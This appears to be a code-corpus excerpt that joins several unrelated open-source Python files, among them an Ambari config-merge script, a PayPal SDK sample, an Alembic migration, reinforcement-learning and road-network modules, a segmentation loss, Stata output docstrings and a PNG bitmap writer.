for path_regex, name in ConfigMerge.CONTENT_UNKNOWN_FILES_MAPPING_FILE.iteritems():
match = re.match(path_regex, os.path.relpath(file_path, ConfigMerge.INPUT_DIR))
if match:
config_name = name
break
if not config_name:
if file in ConfigMerge.NOT_MAPPED_FILES:
if ConfigMerge.UNKNOWN_FILES_MAPPING_FILE:
logger.error("File {0} doesn't match any regex from {1}".format(file_path, ConfigMerge.UNKNOWN_FILES_MAPPING_FILE))
else:
logger.error("Cannot map {0} to Ambari config type. Please use -u option to specify config mapping for this file. \n"
"For more information use --help option for script".format(file_path))
continue
else:
config_name = file
if not config_name in filePaths:
filePaths[config_name] = []
filePaths[config_name].append((file_path, ConfigMerge.PARSER_BY_EXTENSIONS[ext]))
return filePaths
@staticmethod
def merge_configurations(filepath_to_configurations):
configuration_information_dict = {}
property_name_to_value_to_filepaths = {}
merged_configurations = {}
for path, configurations in filepath_to_configurations.iteritems():
for configuration_name, value in configurations.iteritems():
if not configuration_name in property_name_to_value_to_filepaths:
property_name_to_value_to_filepaths[configuration_name] = {}
if not value in property_name_to_value_to_filepaths[configuration_name]:
property_name_to_value_to_filepaths[configuration_name][value] = []
logger.debug("Iterating over '{0}' with value '{1}' in file '{2}'".format(configuration_name, value, path))
property_name_to_value_to_filepaths[configuration_name][value].append(path)
merged_configurations[configuration_name] = value
return merged_configurations, property_name_to_value_to_filepaths
@staticmethod
def format_for_blueprint(configurations, attributes):
all_configs = []
for configuration_type, configuration_properties in configurations.iteritems():
is_content = False
all_configs.append({})
for config_with_content in ConfigMerge.CONFIGS_WITH_CONTENT:
if config_with_content in configuration_type:
is_content = True
break
if is_content:
content = LICENSE
for property_name, property_value in configuration_properties.iteritems():
content+=property_name + "=" + property_value + "\n"
all_configs[-1][configuration_type] = {'properties': {"content" : content}}
else:
all_configs[-1][configuration_type] = {'properties' :configuration_properties}
for configuration_type_attributes, properties_attributes in attributes.iteritems():
if properties_attributes and configuration_type == configuration_type_attributes:
all_configs[-1][configuration_type].update({"properties_attributes" : {"final" : properties_attributes}})
return {
"configurations": all_configs,
"host_groups": [],
"Blueprints": {}
}
@staticmethod
def format_conflicts_output(property_name_to_value_to_filepaths):
output = ""
for property_name, value_to_filepaths in property_name_to_value_to_filepaths.iteritems():
if len(value_to_filepaths) == 1:
continue
first_item = False
for value, filepaths in value_to_filepaths.iteritems():
if not first_item:
first_item = True
output += "\n\n=== {0} | {1} | {2} |\nHas conflicts with:\n\n".format(property_name,filepaths[0], value)
continue
for filepath in filepaths:
output += "| {0} | {1} | {2} |\n".format(property_name, filepath, value)
return output
def perform_merge(self):
result_configurations = {}
result_property_attributes = {}
has_conflicts = False
for filename, paths_and_parsers in self.config_files_map.iteritems():
filepath_to_configurations = {}
filepath_to_property_attributes = {}
configuration_type = os.path.splitext(filename)[0]
for path_and_parser in paths_and_parsers:
path, parser = path_and_parser
logger.debug("Read data from {0}".format(path))
parsed_configurations_from_path, parsed_properties_attributes = parser.read_data_to_map(path)
if parsed_configurations_from_path != None:
filepath_to_configurations[path] = parsed_configurations_from_path
if parsed_properties_attributes != None:
filepath_to_property_attributes[path] = parsed_properties_attributes
#configs merge
merged_configurations, property_name_to_value_to_filepaths = ConfigMerge.merge_configurations(
filepath_to_configurations)
#properties attributes merge
merged_attributes, property_name_to_attribute_to_filepaths = ConfigMerge.merge_configurations(
filepath_to_property_attributes)
configuration_conflicts_output = ConfigMerge.format_conflicts_output(property_name_to_value_to_filepaths)
attribute_conflicts_output = ConfigMerge.format_conflicts_output(property_name_to_attribute_to_filepaths)
if configuration_conflicts_output:
has_conflicts = True
conflict_filename = os.path.join(self.OUTPUT_DIR, configuration_type + "-conflicts.txt")
logger.warn(
"You have configurations conflicts for {0}. Please check {1}".format(configuration_type, conflict_filename))
with open(conflict_filename, "w") as fp:
fp.write(configuration_conflicts_output)
if attribute_conflicts_output:
has_conflicts = True
conflict_filename = os.path.join(self.OUTPUT_DIR, configuration_type + "-attributes-conflicts.txt")
logger.warn(
"You have property attribute conflicts for {0}. Please check {1}".format(configuration_type, conflict_filename))
with open(conflict_filename, "w") as fp:
fp.write(attribute_conflicts_output)
result_configurations[configuration_type] = merged_configurations
result_property_attributes[configuration_type] = merged_attributes
result_json_file = os.path.join(self.OUTPUT_DIR, "blueprint.json")
logger.info("Using '{0}' file as output for blueprint template".format(result_json_file))
with open(result_json_file, 'w') as outfile:
outfile.write(json.dumps(ConfigMerge.format_for_blueprint(result_configurations, result_property_attributes), sort_keys=True, indent=4,
separators=(',', ': ')))
if has_conflicts:
logger.info("Script finished with configurations conflicts, please resolve them before using the blueprint")
return 1
else:
logger.info("Script successfully finished")
return 0
def perform_diff(self):
configurations_conflicts = {}
attributes_conflicts = {}
file_conflicts = []
matches_configs = []
for right_configs_names in self.right_file_paths:
for left_configs_names in self.left_file_paths:
if right_configs_names == left_configs_names:
matches_configs.append(right_configs_names)
for match_config in matches_configs:
configurations_conflicts[match_config], attributes_conflicts[match_config] = ConfigMerge.configuration_diff(self.left_file_paths[match_config], self.right_file_paths[match_config])
file_conflicts = ConfigMerge.get_missing_files(self.right_file_paths, matches_configs, ConfigMerge.LEFT_INPUT_DIR) + \
ConfigMerge.get_missing_files(self.left_file_paths, matches_configs, ConfigMerge.RIGHT_INPUT_DIR)
configuration_diff_output = None
configuration_diff_output = ConfigMerge.format_diff_output(file_conflicts, configurations_conflicts, attributes_conflicts)
if configuration_diff_output and configuration_diff_output != "":
conflict_filename = os.path.join(ConfigMerge.OUTPUT_DIR, "file-diff.txt")
logger.warn(
"You have file diff conflicts. Please check {0}".format(conflict_filename))
with open(conflict_filename, "w") as fp:
fp.write(configuration_diff_output)
logger.info("Script successfully finished")
return 0
@staticmethod
def format_diff_output(file_conflicts, configurations_conflicts, attributes_conflicts):
output = ""
if file_conflicts:
output += "======= File diff conflicts ====== \n\n"
for file_conflict in file_conflicts:
output+=str(file_conflict)+"\n"
if configurations_conflicts:
output += "\n\n======= Property diff conflicts ====== "
for config_name, property in configurations_conflicts.iteritems():
if property:
output+= "\n\n||| " + config_name + " |||\n"
output+= "\n".join(str(p) for p in property)
if attributes_conflicts:
output += "\n\n======= Final attribute diff conflicts ====== "
for config_name, property_with_attribute in attributes_conflicts.iteritems():
if property_with_attribute:
output+= "\n\n||| " + config_name + " |||\n"
output+= "\n".join(str(p) for p in property_with_attribute)
return output
@staticmethod
def configuration_diff(left, right):
properties_conflicts = []
attributes_conflicts = []
left_path, left_parser = left[0]
left_configurations, left_attributes = left_parser.read_data_to_map(left_path)
right_path, right_parser = right[0]
right_configurations, right_attributes = right_parser.read_data_to_map(right_path)
matches_configs = []
matches_attributes = []
matches_configs, properties_conflicts = ConfigMerge.get_conflicts_and_matches(left_configurations, right_configurations, left_path, right_path)
properties_conflicts += ConfigMerge.get_missing_properties(left_configurations, matches_configs, right_path) + \
ConfigMerge.get_missing_properties(right_configurations, matches_configs, left_path)
if left_attributes and right_attributes:
matches_attributes, attributes_conflicts = ConfigMerge.get_conflicts_and_matches(left_attributes, right_attributes, left_path, right_path)
attributes_conflicts += ConfigMerge.get_missing_attributes(left_attributes, matches_attributes, right_path) + \
ConfigMerge.get_missing_attributes(right_attributes, matches_attributes, left_path)
elif left_attributes:
attributes_conflicts = ConfigMerge.get_missing_attributes(left_attributes, matches_attributes, right_path)
elif right_attributes:
attributes_conflicts = ConfigMerge.get_missing_attributes(right_attributes, matches_attributes, left_path)
return properties_conflicts, attributes_conflicts
@staticmethod
def get_conflicts_and_matches(left_items, right_items, left_path, right_path):
matches = []
conflicts = []
for left_key, left_value in left_items.iteritems():
for right_key, right_value in right_items.iteritems():
if left_key == right_key:
matches.append(right_key)
if left_value != right_value:
conflicts.append({right_key : [{left_path : left_value}, {right_path :right_value}]})
return matches, conflicts
@staticmethod
def get_missing_attributes(attributes, matches, file_path):
conflicts = []
for key, value in attributes.iteritems():
if not key in matches:
conflicts.append({key : "Final attribute is missing in {0} file".format(file_path)})
return conflicts
@staticmethod
def get_missing_properties(configurations, matches, file_path):
conflicts = []
for key, value in configurations.iteritems():
if not key in matches:
conflicts.append({key : "Property is missing in {0} file".format(file_path)})
return conflicts
@staticmethod
def get_missing_files(config_file_paths, matches, input_dir):
conflicts = []
for file_name in config_file_paths:
if file_name not in matches:
conflicts.append({file_name : "Configurations file is missing for {0} directory".format(input_dir)})
return conflicts
def main():
tempDir = tempfile.gettempdir()
outputDir = os.path.join(tempDir)
parser = optparse.OptionParser(usage="usage: %prog [options]")
parser.set_description('This python program is an Ambari thin client and '
'supports Ambari cluster takeover by generating a '
'configuration json that can be used with a '
'blueprint.\n\nIt reads actual hadoop configs '
'from a target directory and produces an out file '
'with problems found that need to be addressed and '
'the json file which can be used to create the '
                         'blueprint.\n\nThis script only works with *.xml, *.yaml, '
                         '*.properties and *.sh files.')
parser.add_option("-a", "--action", dest="action", default = "merge",
help="Script action. (merge/diff) [default: merge]")
parser.add_option("-v", "--verbose", dest="verbose", action="store_true",
default=False, help="output verbosity.")
parser.add_option("-o", "--outputdir", dest="outputDir", default=outputDir,
metavar="FILE", help="Output directory. [default: /tmp]")
parser.add_option("-u", '--unknown-files-mapping-file',dest="unknown_files_mapping_file",
metavar="FILE", help=CONFIG_MAPPING_HELP_TEXT, default="takeover_files_mapping.json")
merge_options_group = OptionGroup(parser, "Required options for action 'merge'")
merge_options_group.add_option("-i", "--inputdir", dest="inputDir", help="Input directory.")
parser.add_option_group(merge_options_group)
diff_options_group = OptionGroup(parser, "Required options for action 'diff'")
diff_options_group.add_option("-l", "--leftInputDir", dest="leftInputDir", help="Left input directory.")
diff_options_group.add_option("-r", "--rightInputDir", dest="rightInputDir", help="Right input directory.")
parser.add_option_group(diff_options_group)
(options, args) = parser.parse_args()
# set verbose
if options.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
ConfigMerge.OUTPUT_DIR = options.outputDir
if not os.path.exists(ConfigMerge.OUTPUT_DIR):
os.makedirs(ConfigMerge.OUTPUT_DIR)
logegr_file_name = os.path.join(ConfigMerge.OUTPUT_DIR, "takeover_config_merge.log")
file_handler = logging.FileHandler(logegr_file_name, mode="w")
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(logging.INFO)
stdout_handler.setFormatter(formatter)
logger.addHandler(stdout_handler)
#unknown file mapping
if options.unknown_files_mapping_file and os.path.exists(options.unknown_files_mapping_file):
ConfigMerge.UNKNOWN_FILES_MAPPING_FILE = options.unknown_files_mapping_file
with open(options.unknown_files_mapping_file) as f:
ConfigMerge.CONTENT_UNKNOWN_FILES_MAPPING_FILE = json.load(f)
else:
logger.warning("Config mapping file was not found at {0}. "
"Please provide it at the given path or provide a different path to it using -u option.".format(options.unknown_files_mapping_file))
if options.action == "merge" :
ConfigMerge.INPUT_DIR = options.inputDir
file_paths = ConfigMerge.get_all_supported_files_grouped_by_name(directory=ConfigMerge.INPUT_DIR)
logger.info("Writing logs into '{0}' file".format(logegr_file_name))
logger.debug("Following configuration files found:\n{0}".format(file_paths.items()))
config_merge = ConfigMerge(config_files_map=file_paths)
return config_merge.perform_merge()
elif options.action == "diff" :
if options.leftInputDir and os.path.isdir(options.leftInputDir):
ConfigMerge.LEFT_INPUT_DIR = options.leftInputDir
else:
logger.error("Directory \"{0}\" doesn't exist. Use option \"-h\" for details".format(options.leftInputDir))
return -1
if options.rightInputDir and os.path.isdir(options.rightInputDir):
ConfigMerge.RIGHT_INPUT_DIR = options.rightInputDir
else:
logger.error("Directory \"{0}\" doesn't exist. Use option \"-h\" for details".format(options.rightInputDir))
return -1
logger.info("Writing logs into '{0}' file".format(logegr_file_name))
left_file_paths = ConfigMerge.get_all_supported_files_grouped_by_name(directory=ConfigMerge.LEFT_INPUT_DIR)
logger.debug("Following configuration files found:\n{0} for left directory".format(left_file_paths.items()))
right_file_paths = ConfigMerge.get_all_supported_files_grouped_by_name(directory=ConfigMerge.RIGHT_INPUT_DIR)
logger.debug("Following configuration files found:\n{0} for right directory".format(right_file_paths.items()))
config_merge = ConfigMerge(left_file_paths=left_file_paths , right_file_paths=right_file_paths)
return config_merge.perform_diff()
else:
logger.error("Action \"{0}\" doesn't supports by script. Use option \"-h\" for details".format(options.action))
return -1
if __name__ == "__main__":
try:
sys.exit(main())
except (KeyboardInterrupt, EOFError):
print("\nAborting ... Keyboard Interrupt.")
sys.exit(1)
|
samples/payment/all.py | Hey-Marvelous/PayPal-Python-SDK | 653 | 12686633 |
# GetPaymentList Sample
# This sample code demonstrates how you can
# retrieve a list of all Payment resources
# you've created using the Payments API.
# Note various query parameters that you can
# use to filter, and paginate through the
# payments list.
# API used: GET /v1/payments/payments
from paypalrestsdk import Payment
import logging
logging.basicConfig(level=logging.INFO)
# Retrieve
# Retrieve the PaymentHistory by calling the
# `all` method
# on the Payment class
# Refer the API documentation
# for valid values for keys
# Supported parameters are :count, :next_id
payment_history = Payment.all({"count": 2})
# List Payments
print("List Payment:")
for payment in payment_history.payments:
print(" -> Payment[%s]" % (payment.id))
|
migrations/versions/2e9d99288cd_.py | IsmaelJS/test-github-actions | 1,420 | 12686651 |
"""empty message
Revision ID: <KEY>
Revises: 36954739c63
Create Date: 2015-11-23 21:16:54.103342
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '3<PASSWORD>4<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('user') as batch_op:
batch_op.alter_column('created',
existing_type=sa.DATETIME(),
nullable=False)
batch_op.alter_column('updated',
existing_type=sa.DATETIME(),
nullable=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('user') as batch_op:
batch_op.alter_column('updated',
existing_type=sa.DATETIME(),
nullable=True)
batch_op.alter_column('created',
existing_type=sa.DATETIME(),
nullable=True)
### end Alembic commands ###
|
meter/datamodules/trash/nlvr2_datamodule.py | shinying/METER | 135 | 12686654 |
from ..datasets import NLVR2Dataset
from .datamodule_base import BaseDataModule
class NLVR2DataModule(BaseDataModule):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@property
def dataset_cls(self):
return NLVR2Dataset
@property
def dataset_name(self):
return "nlvr2"
|
telemetry/third_party/web-page-replay/rules/rule.py | ravitejavalluri/catapult | 226 | 12686688 |
#!/usr/bin/env python
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class Rule(object):
"""An optional base class for rule implementations.
The rule_parser looks for the 'IsType' and 'ApplyRule' methods by name, so
rules are not strictly required to extend this class.
"""
def IsType(self, rule_type_name):
"""Returns True if the name matches this rule."""
raise NotImplementedError
def ApplyRule(self, return_value, request, response):
"""Invokes this rule with the given args.
Args:
return_value: the prior rule's return_value (if any).
request: the httparchive ArchivedHttpRequest.
response: the httparchive ArchivedHttpResponse, which may be None.
Returns:
A (should_stop, return_value) tuple. Typically the request and response
are treated as immutable, so it's the caller's job to apply the
return_value (e.g., set response fields).
"""
raise NotImplementedError
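# --- Illustrative sketch (not part of the original file) ---------------------
# A minimal concrete rule showing the IsType/ApplyRule contract described in
# the docstrings above.  The class name and the 'log_request' rule type are
# hypothetical, not part of the real web-page-replay rule set.
class LogRequestRule(Rule):
    """Example rule that records each request and never stops the chain."""
    def __init__(self):
        self.seen = []
    def IsType(self, rule_type_name):
        return rule_type_name == 'log_request'
    def ApplyRule(self, return_value, request, response):
        self.seen.append(request)
        # (should_stop, return_value): let later rules run and pass the value on.
        return False, return_value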
|
src/garage/envs/mujoco/half_cheetah_env_meta_base.py | blacksph3re/garage | 1,500 | 12686690 | """Base class of HalfCheetah meta-environments."""
from gym.envs.mujoco import HalfCheetahEnv as HalfCheetahEnv_
import numpy as np
from garage import EnvSpec
class HalfCheetahEnvMetaBase(HalfCheetahEnv_):
"""Base class of HalfCheetah meta-environments.
Code is adapted from
https://github.com/tristandeleu/pytorch-maml-rl/blob/493e677e724aa67a531250b0e215c8dbc9a7364a/maml_rl/envs/mujoco/half_cheetah.py
Which was in turn adapted from
https://github.com/cbfinn/maml_rl/blob/9c8e2ebd741cb0c7b8bf2d040c4caeeb8e06cc95/rllab/envs/mujoco/half_cheetah_env_rand.py
Args:
task (dict): Subclass specific task information.
"""
def __init__(self, task):
self._task = task
super().__init__()
self.spec = EnvSpec(action_space=self.action_space,
observation_space=self.observation_space)
def _get_obs(self):
"""Get a low-dimensional observation of the state.
Returns:
np.ndarray: Contains the flattened angle quaternion, angular
velocity quaternion, and cartesian position.
"""
return np.concatenate([
self.sim.data.qpos.flat[1:],
self.sim.data.qvel.flat,
self.get_body_com('torso').flat,
]).astype(np.float32).flatten()
def viewer_setup(self):
"""Start the viewer."""
camera_id = self.model.camera_name2id('track')
self.viewer.cam.type = 2
self.viewer.cam.fixedcamid = camera_id
self.viewer.cam.distance = self.model.stat.extent * 0.35
# Hide the overlay
# This code was inheritted, so we'll ignore this access violation for
# now.
# pylint: disable=protected-access
self.viewer._hide_overlay = True
def __getstate__(self):
"""See `Object.__getstate__.
Returns:
dict: The instance’s dictionary to be pickled.
"""
return dict(task=self._task)
def __setstate__(self, state):
"""See `Object.__setstate__.
Args:
state (dict): Unpickled state of this object.
"""
self.__init__(task=state['task'])
|
metadrive/component/road_network/edge_road_network.py | liuzuxin/metadrive | 125 | 12686692 | from metadrive.component.road_network.base_road_network import BaseRoadNetwork, LaneIndex
import gc
import copy
import logging
from typing import List, Tuple, Dict
import numpy as np
from metadrive.component.lane.abs_lane import AbstractLane
from metadrive.component.road_network.road import Road
from metadrive.component.road_network.base_road_network import BaseRoadNetwork
from metadrive.constants import Decoration
from metadrive.utils.math_utils import get_boxes_bounding_box
from metadrive.utils.scene_utils import get_lanes_bounding_box
from collections import namedtuple
lane_info = namedtuple("neighbor_lanes", "lane entry_lanes exit_lanes left_lanes right_lanes")
class EdgeRoadNetwork(BaseRoadNetwork):
"""
Compared to NodeRoadNetwork, which represents the relation of lanes in a node-based graph, EdgeRoadNetwork stores
the relationship in an edge-based graph, which is more common in real map representations.
"""
def __init__(self):
super(EdgeRoadNetwork, self).__init__()
self.graph = {}
def add_lane(self, lane) -> None:
self.graph[lane.index] = lane_info(
lane=lane,
entry_lanes=lane.entry_lanes,
exit_lanes=lane.exit_lanes,
left_lanes=lane.left_lanes,
right_lanes=lane.right_lanes
)
def get_lane(self, index: LaneIndex):
return self.graph[index].lane
def __isub__(self, other):
for id, lane_info in other.graph.items():
self.graph.pop(id)
return self
def add(self, other, no_intersect=True):
for id, lane_info in other.graph.items():
if no_intersect:
assert id not in self.graph.keys(), "Intersect: {} exists in two network".format(id)
self.graph[id] = other.graph[id]
return self
def _get_bounding_box(self):
"""
By using this bounding box, the edge length of x, y direction and the center of this road network can be
easily calculated.
:return: minimum x value, maximum x value, minimum y value, maximum y value
"""
lanes = []
for id, lane_info in self.graph.items():
lanes.append(lane_info.lane)
res_x_max, res_x_min, res_y_max, res_y_min = get_boxes_bounding_box([get_lanes_bounding_box(lanes)])
return res_x_min, res_x_max, res_y_min, res_y_max
def shortest_path(self, start: str, goal: str):
return next(self.bfs_paths(start, goal), [])
def bfs_paths(self, start: str, goal: str) -> List[List[str]]:
"""
Breadth-first search of all routes from start to goal.
:param start: starting node
:param goal: goal node
:return: list of paths from start to goal.
"""
queue = [(start, [start])]
while queue:
(node, path) = queue.pop(0)
if node not in self.graph:
yield []
for _next in set(self.graph[node].exit_lanes) - set(path):
if _next == goal:
yield path + [_next]
elif _next in self.graph:
queue.append((_next, path + [_next]))
def get_peer_lanes_from_index(self, lane_index):
info: lane_info = self.graph[lane_index]
ret = [self.graph[lane_index].lane]
for left_n in info.left_lanes:
ret.append(self.graph[left_n["id"]].lane)
for right_n in info.right_lanes:
ret.append(self.graph[right_n["id"]].lane)
return ret
def destroy(self):
super(EdgeRoadNetwork, self).destroy()
for k, v in self.graph.items():
v.lane.destroy()
self.graph[k]: lane_info = None
self.graph = None
def __del__(self):
logging.debug("{} is released".format(self.__class__.__name__))
|
ml3d/torch/modules/losses/semseg_loss.py | krshrimali/Open3D-ML | 346 | 12686699 | import torch
import torch.nn as nn
from ....datasets.utils import DataProcessing
def filter_valid_label(scores, labels, num_classes, ignored_label_inds, device):
"""Loss functions for semantic segmentation."""
valid_scores = scores.reshape(-1, num_classes)
valid_labels = labels.reshape(-1).to(device)
ignored_bool = torch.zeros_like(valid_labels, dtype=torch.bool)
for ign_label in ignored_label_inds:
ignored_bool = torch.logical_or(ignored_bool,
torch.eq(valid_labels, ign_label))
valid_idx = torch.where(torch.logical_not(ignored_bool))[0].to(device)
valid_scores = torch.gather(valid_scores, 0,
valid_idx.unsqueeze(-1).expand(-1, num_classes))
valid_labels = torch.gather(valid_labels, 0, valid_idx)
# Reduce label values in the range of logit shape
reducing_list = torch.arange(0, num_classes, dtype=torch.int64)
inserted_value = torch.zeros([1], dtype=torch.int64)
for ign_label in ignored_label_inds:
if ign_label >= 0:
reducing_list = torch.cat([
reducing_list[:ign_label], inserted_value,
reducing_list[ign_label:]
], 0)
valid_labels = torch.gather(reducing_list.to(device), 0,
valid_labels.long())
return valid_scores, valid_labels
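# --- Illustrative usage sketch (not part of the original file) ---------------
# Filtering logits and labels for a toy 3-class problem in which label 0 is
# ignored.  Shapes and values are made up purely for illustration.
#     scores = torch.randn(8, 3)                 # 8 points, 3 classes
#     labels = torch.randint(0, 3, (8,))
#     valid_scores, valid_labels = filter_valid_label(
#         scores, labels, num_classes=3, ignored_label_inds=[0], device='cpu')
#     # points whose label is in ignored_label_inds are dropped and the
#     # remaining labels are remapped to a contiguous range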
class SemSegLoss(object):
"""Loss functions for semantic segmentation."""
def __init__(self, pipeline, model, dataset, device):
super(SemSegLoss, self).__init__()
# weighted_CrossEntropyLoss
if 'class_weights' in dataset.cfg.keys() and len(
dataset.cfg.class_weights) != 0:
class_wt = DataProcessing.get_class_weights(
dataset.cfg.class_weights)
weights = torch.tensor(class_wt, dtype=torch.float, device=device)
self.weighted_CrossEntropyLoss = nn.CrossEntropyLoss(weight=weights)
else:
self.weighted_CrossEntropyLoss = nn.CrossEntropyLoss()
|
venv/Lib/site-packages/statsmodels/iolib/stata_summary_examples.py | EkremBayar/bayar | 6,931 | 12686708 |
""". regress totemp gnpdefl gnp unemp armed pop year
Source | SS df MS Number of obs = 16
-------------+------------------------------ F( 6, 9) = 330.29
Model | 184172402 6 30695400.3 Prob > F = 0.0000
Residual | 836424.129 9 92936.0144 R-squared = 0.9955
-------------+------------------------------ Adj R-squared = 0.9925
Total | 185008826 15 12333921.7 Root MSE = 304.85
------------------------------------------------------------------------------
totemp | Coef. Std. Err. t P>|t| [95% Conf. Interval]
-------------+----------------------------------------------------------------
gnpdefl | 15.06167 84.91486 0.18 0.863 -177.0291 207.1524
gnp | -.0358191 .033491 -1.07 0.313 -.111581 .0399428
unemp | -2.020229 .4883995 -4.14 0.003 -3.125065 -.9153928
armed | -1.033227 .2142741 -4.82 0.001 -1.517948 -.5485049
pop | -.0511045 .2260731 -0.23 0.826 -.5625173 .4603083
year | 1829.151 455.4785 4.02 0.003 798.7873 2859.515
_cons | -3482258 890420.3 -3.91 0.004 -5496529 -1467987
------------------------------------------------------------------------------
"""
#From Stata using Longley dataset as in the test and example for GLM
"""
. glm totemp gnpdefl gnp unemp armed pop year
Iteration 0: log likelihood = -109.61744
Generalized linear models No. of obs = 16
Optimization : ML Residual df = 9
Scale parameter = 92936.01
Deviance = 836424.1293 (1/df) Deviance = 92936.01
Pearson = 836424.1293 (1/df) Pearson = 92936.01
Variance function: V(u) = 1 [Gaussian]
Link function : g(u) = u [Identity]
AIC = 14.57718
Log likelihood = -109.6174355 BIC = 836399.2
------------------------------------------------------------------------------
| OIM
totemp | Coef. Std. Err. z P>|z| [95% Conf. Interval]
-------------+----------------------------------------------------------------
gnpdefl | 15.06167 84.91486 0.18 0.859 -151.3684 181.4917
gnp | -.0358191 .033491 -1.07 0.285 -.1014603 .029822
unemp | -2.020229 .4883995 -4.14 0.000 -2.977475 -1.062984
armed | -1.033227 .2142741 -4.82 0.000 -1.453196 -.6132571
pop | -.0511045 .2260731 -0.23 0.821 -.4941996 .3919906
year | 1829.151 455.4785 4.02 0.000 936.4298 2721.873
_cons | -3482258 890420.3 -3.91 0.000 -5227450 -1737066
------------------------------------------------------------------------------
"""
#RLM Example
"""
. rreg stackloss airflow watertemp acidconc
Huber iteration 1: maximum difference in weights = .48402478
Huber iteration 2: maximum difference in weights = .07083248
Huber iteration 3: maximum difference in weights = .03630349
Biweight iteration 4: maximum difference in weights = .2114744
Biweight iteration 5: maximum difference in weights = .04709559
Biweight iteration 6: maximum difference in weights = .01648123
Biweight iteration 7: maximum difference in weights = .01050023
Biweight iteration 8: maximum difference in weights = .0027233
Robust regression Number of obs = 21
F( 3, 17) = 74.15
Prob > F = 0.0000
------------------------------------------------------------------------------
stackloss | Coef. Std. Err. t P>|t| [95% Conf. Interval]
-------------+----------------------------------------------------------------
airflow | .8526511 .1223835 6.97 0.000 .5944446 1.110858
watertemp | .8733594 .3339811 2.61 0.018 .1687209 1.577998
acidconc | -.1224349 .1418364 -0.86 0.400 -.4216836 .1768139
_cons | -41.6703 10.79559 -3.86 0.001 -64.447 -18.89361
------------------------------------------------------------------------------
"""
|
test/integration/samples_in/simple.py | Inveracity/flynt | 487 | 12686746 | var = 5
a = "my string {}".format(var)
|
depixel/io_png.py | sknebel/depixel | 128 | 12686749 |
import png
from depixel.io_data import PixelDataWriter
class Bitmap(object):
mode = 'RGB'
bgcolour = (127, 127, 127)
def __init__(self, size, bgcolour=None, mode=None):
if bgcolour is not None:
self.bgcolour = bgcolour
if mode is not None:
self.mode = mode
self.size = size
self.pixels = []
for _ in range(self.size[1]):
self.pixels.append([self.bgcolour] * self.size[0])
def set_pixel(self, x, y, value):
self.pixels[y][x] = value
def pixel(self, x, y):
return self.pixels[y][x]
def set_data(self, data):
assert len(data) == self.size[1]
new_pixels = []
for row in data:
assert len(row) == self.size[0]
new_pixels.append(row[:])
self.pixels = new_pixels
def set_block(self, x, y, data):
assert 0 <= x <= (self.size[0] - len(data[0]))
assert 0 <= y <= (self.size[1] - len(data))
for dy, row in enumerate(data):
for dx, value in enumerate(row):
self.set_pixel(x + dx, y + dy, value)
def flat_pixels(self):
flat_pixels = []
for row in self.pixels:
frow = []
for value in row:
frow.extend(value)
flat_pixels.append(frow)
return flat_pixels
def write_png(self, filename):
png.from_array(self.flat_pixels(), mode=self.mode).save(filename)
def draw_line(self, p0, p1, colour):
"""Bresenham's line algorithm."""
x0, y0 = p0
x1, y1 = p1
dx = abs(x0 - x1)
dy = abs(y0 - y1)
sx = 1 if x0 < x1 else -1
sy = 1 if y0 < y1 else -1
err = dx - dy
while (x0, y0) != (x1, y1):
self.set_pixel(x0, y0, colour)
e2 = 2 * err
if e2 > -dy:
err -= dy
x0 += sx
if e2 < dx:
err += dx
y0 += sy
self.set_pixel(x1, y1, colour)
def fill(self, point, colour):
old_colour = self.pixels[point[1]][point[0]]
if old_colour == colour:
return
self.fill_scan(point, old_colour, colour)
def fill_pix(self, point, old_colour, colour):
"""
Pixel flood-fill. Reliable, but slow.
"""
to_fill = [point]
while to_fill:
x, y = to_fill.pop()
self.set_pixel(x, y, colour)
for nx, ny in [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]:
if 0 <= nx < self.size[0] and 0 <= ny < self.size[1]:
if self.pixels[ny][nx] == old_colour:
to_fill.append((nx, ny))
def fill_scan(self, point, old_colour, colour):
"""
Scanline flood-fill. Fast, but I'm not entirely sure what it's doing.
"""
to_fill = [point]
while to_fill:
x, y = to_fill.pop()
while y > 0 and self.pixel(x, y - 1) == old_colour:
y -= 1
lspan = False
rspan = False
while y < self.size[1] and self.pixel(x, y) == old_colour:
self.set_pixel(x, y, colour)
if not lspan and x > 0 and self.pixel(x - 1, y) == old_colour:
to_fill.append((x - 1, y))
lspan = True
elif lspan and x > 0 and self.pixel(x - 1, y) != old_colour:
lspan = False
if (not rspan and x < self.size[0] - 1
and self.pixel(x + 1, y) == old_colour):
to_fill.append((x + 1, y))
rspan = True
elif (rspan and x < self.size[0] - 1
and self.pixel(x + 1, y) != old_colour):
rspan = False
y += 1
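# --- Illustrative usage sketch (not part of the original module) -------------
# Drawing with the Bitmap class directly.  Colours are RGB tuples and the
# output filename is arbitrary.
#     bmp = Bitmap((32, 32), bgcolour=(255, 255, 255))
#     bmp.draw_line((0, 0), (31, 31), (255, 0, 0))   # Bresenham line
#     bmp.fill((1, 30), (0, 0, 255))                 # scanline flood fill
#     bmp.write_png('demo.png')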
class PixelDataPngWriter(PixelDataWriter):
FILE_EXT = 'png'
def translate_pixel(self, pixel):
if not isinstance(pixel, (list, tuple)):
# Assume monochrome values normalised to [0, 1].
return (int(255 * pixel),) * 3
return pixel
def make_drawing(self, drawing_type, _filename):
if drawing_type == 'pixels':
return Bitmap(self.pixel_data.size)
return Bitmap((self.pixel_data.size_x * self.PIXEL_SCALE + 1,
self.pixel_data.size_y * self.PIXEL_SCALE + 1),
bgcolour=(127, 127, 127))
def save_drawing(self, drawing, filename):
drawing.write_png(filename)
def draw_pixel(self, drawing, pt, colour):
drawing.set_pixel(pt[0], pt[1], self.translate_pixel(colour))
